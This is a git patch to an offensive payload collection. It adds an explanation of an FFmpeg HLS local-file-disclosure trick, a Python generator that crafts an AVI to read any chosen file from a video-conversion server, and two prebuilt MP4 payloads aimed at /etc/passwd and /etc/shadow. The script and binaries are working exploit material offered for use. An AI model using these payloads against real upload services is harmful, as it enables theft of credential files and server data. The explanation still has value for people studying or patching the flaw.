From ab63a537e73a4e195454357137540aed17ce9fa3 Mon Sep 17 00:00:00 2001
From: Swissky <maxropelewski@gmail.com>
Date: Wed, 28 Jun 2017 22:45:36 +0200
Subject: [PATCH] FFMpeg injection - Bypass and explanation

---
 Upload insecure files/Ffmpeg HLS/README.md    |  22 ++++++++++
 .../Ffmpeg HLS/gen_avi_bypass.py              |  38 ++++++++++++++++++
 .../Ffmpeg HLS/read_passwd_bypass.mp4         | Bin 0 -> 10761 bytes
 .../Ffmpeg HLS/read_shadow_bypass.mp4         | Bin 0 -> 10761 bytes
 4 files changed, 60 insertions(+)
 create mode 100644 Upload insecure files/Ffmpeg HLS/gen_avi_bypass.py
 create mode 100644 Upload insecure files/Ffmpeg HLS/read_passwd_bypass.mp4
 create mode 100644 Upload insecure files/Ffmpeg HLS/read_shadow_bypass.mp4

diff --git a/Upload insecure files/Ffmpeg HLS/README.md b/Upload insecure files/Ffmpeg HLS/README.md
index e8f5b85..9d33035 100644
--- a/Upload insecure files/Ffmpeg HLS/README.md	
+++ b/Upload insecure files/Ffmpeg HLS/README.md	
@@ -10,7 +10,29 @@ FFmpeg is an open source software used for processing audio and video formats. Y
 5. If you are lucky, you'll the content of `<filename>` from the server.
 ```
 
+## How it works (Explanations from neex - Hackerone links)
+the script creates an AVI that contains an HLS playlist inside GAB2. The playlist generated by this script looks like this:
+```
+#EXTM3U
+#EXT-X-MEDIA-SEQUENCE:0
+#EXTINF:1.0
+GOD.txt
+#EXTINF:1.0
+/etc/passwd
+#EXT-X-ENDLIST
+```
+To process a playlist ffmpeg concatenates all segments and processes it as single file.
+To determine the type of this file FFmpeg uses the first segment of the playlist.
+FFmpeg processes .txt files in a special way. It tries to show a screen capture of a tty printing this file.    
+
+So, the playlist above will be processed as follows:
+FFmpeg sees #EXTM3U signature inside GAB2 chunk and determines file type as HLS playlist.
+The file GOD.txt doesn't even exist, but it's name is enough for FFmpeg to detect file type as .txt.
+FFmpeg concatenates the contents of all segments of the playlist. As only one of two segments actually exists, the result of concatenation is just the contents of the file we want to retrieve.
+Because the type of this concatenation is .txt, FFmpeg draws a tty that prints the file.
+
 ## Thanks to
 * [Hackerone - Local File Disclosure via ffmpeg @sxcurity](https://hackerone.com/reports/242831)
+* [Hackerone - Another local file disclosure via ffmpeg](https://hackerone.com/reports/243470)
 * [PHDays - Attacks on video converters:a year later, Emil Lerner, Pavel Cheremushkin](https://docs.google.com/presentation/d/1yqWy_aE3dQNXAhW8kxMxRqtP7qMHaIfMzUDpEqFneos/edit#slide=id.p)
 * [Script by @neex](https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py)
diff --git a/Upload insecure files/Ffmpeg HLS/gen_avi_bypass.py b/Upload insecure files/Ffmpeg HLS/gen_avi_bypass.py
new file mode 100644
index 0000000..2aea429
--- /dev/null
+++ b/Upload insecure files/Ffmpeg HLS/gen_avi_bypass.py	
@@ -0,0 +1,38 @@
+import struct
+import argparse
+
+AVI_HEADER = b"RIFF\x00\x00\x00\x00AVI LIST\x14\x01\x00\x00hdrlavih8\x00\x00\x00@\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00}\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LISTt\x00\x00\x00strlstrh8\x00\x00\x00txts\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00}\x00\x00\x00\x86\x03\x00\x00\x10'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\xa0\x00strf(\x00\x00\x00(\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x01\x00\x18\x00XVID\x00H\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LIST    movi"
+
+
+def make_txt_packet(content, fake_packets=50, fake_packet_len=200):
+    content = b'GAB2\x00\x02\x00' + b'\x00' * 10 + content
+    packet = b'00tx' + struct.pack('<I', len(content)) + content
+    dcpkt = b'00dc' + struct.pack('<I', fake_packet_len) + b'\x00' * fake_packet_len
+    return packet + dcpkt * fake_packets
+
+TXT_PLAYLIST = """#EXTM3U
+#EXT-X-MEDIA-SEQUENCE:0
+#EXTINF:1.0,
+#EXT-X-BYTERANGE: 0
+{txt}
+#EXTINF:1.0,
+{file}
+#EXT-X-ENDLIST"""
+
+def prepare_txt_packet(txt, filename):
+    return make_txt_packet(TXT_PLAYLIST.format(txt=txt, file=filename).encode())
+
+# TXT_LIST = ['/usr/share/doc/gnupg/Upgrading_From_PGP.txt', '/usr/share/doc/mount/mount.txt', '/etc/pki/nssdb/pkcs11.txt', '/usr/share/gnupg/help.txt']
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser('HLS AVI TXT exploit generator')
+    parser.add_argument('filename', help='file that should be read from convertion instance')
+    parser.add_argument('output_avi', help='where to save the avi')
+    parser.add_argument('--txt', help='any .txt file that exist on target system', default='GOD.txt')
+    args = parser.parse_args()
+    avi = AVI_HEADER + prepare_txt_packet(args.txt, args.filename)
+    output_name = args.output_avi
+
+    with open(output_name, 'wb') as f:
+        f.write(avi)
+
diff --git a/Upload insecure files/Ffmpeg HLS/read_passwd_bypass.mp4 b/Upload insecure files/Ffmpeg HLS/read_passwd_bypass.mp4
new file mode 100644
index 0000000000000000000000000000000000000000..01a51ceae0ffe13f80ed82c8467679020623c55e
GIT binary patch
literal 10761
zcmeH_F;Buk7={nsm>3*%YvQ1Tz^RMrWU<%UL~4XW>PSEX2}VO3WN~ouS2*x<{2BZd
zzr!{`wr}~O$$QD=yMDd*-s}6c69s{y;q@cuCh8`86{W_b*>o_Uj4!Bv`Dx$&j2e}<
zV!cz;71d?2-YoX4oElj^o6=mLl`ryabB|q<ojNF*_Uw;crD{h-gUX6dC;j6wt?gXV
zT+*zleU<hjUtN=6YgliG#?$kBqIJG_r}v@PI#cDP?fyfPChhZH)z*4iZyP`I>Rof!
zGx3#i^|~L$fqUA}C*`KrePTLZ92(cr)$rDD&=>vQ*nG%`&6h!zy^czeiG6z^tw+PJ
zt&9HWM|{uUrUyRYBbfmHH_5d5Uf{#eOi}?pl4<k3z=xliqyl^-)8>1D4?i<W1^7s&
z&G!NyerA#i@R3ZL?*%^m%p?`yBbhee3w-#QNh-icGHt#W`0z86RDh3U+I%nY;b$hP
m03XS;`Cj0|&rDJQK9Xtky}*Z`nWO@IB-7@5fe$}3NyRt*XPuJ(

literal 0
HcmV?d00001

diff --git a/Upload insecure files/Ffmpeg HLS/read_shadow_bypass.mp4 b/Upload insecure files/Ffmpeg HLS/read_shadow_bypass.mp4
new file mode 100644
index 0000000000000000000000000000000000000000..41a468a17d46c8d5b69de54cb006dd63536f6ea1
GIT binary patch
literal 10761
zcmeH_F;Buk7={nsm>3*%YvQ1Tg;N*9WU)tWA~ixGbtIrE35J9=$l~DQuW;b!_%r%b
z{0>WkY~S)lllPL#cl~<rz1R0?H*B{R4Q~)ScVRC+s3?_==hNY0l3r2&`qRGs88s?z
z<$ABI1=Ur#-Y)j6oElj^pVC~Pl`r#bdyid{ojNL;_Uw;+rD`W-gGxcClm7XX)^-*&
zS2Qc?P$h%VSGOeC8P?mO@iJRXw9c3B^gi%f7ix29yZ_iEap$sMwbf1Bj`2g!?U{$Z
ziEd0&ulr%tZl2fm*=AGgF*aQ<3QW_{)!^Q*(--~T*m%lEjVv9GXRjNPiF|t@t;eIU
zos0hGM|{uUrUyRYBbfmHH_5d5Uf{#eOi}?pl4<k3z=xliqyl^-)8>1D4?i<W1^7s&
z&G!NyerA#i@R3ZL?*%^m%p?`yBbhee3w-#QNh-icGHt#W`0z86RDh3U+I%nY;b$hP
m03XS;`Cj0|&rDJQK9Xtky}*Z`nWO@IB-7@5fe$}3NyRr6=beWD

literal 0
HcmV?d00001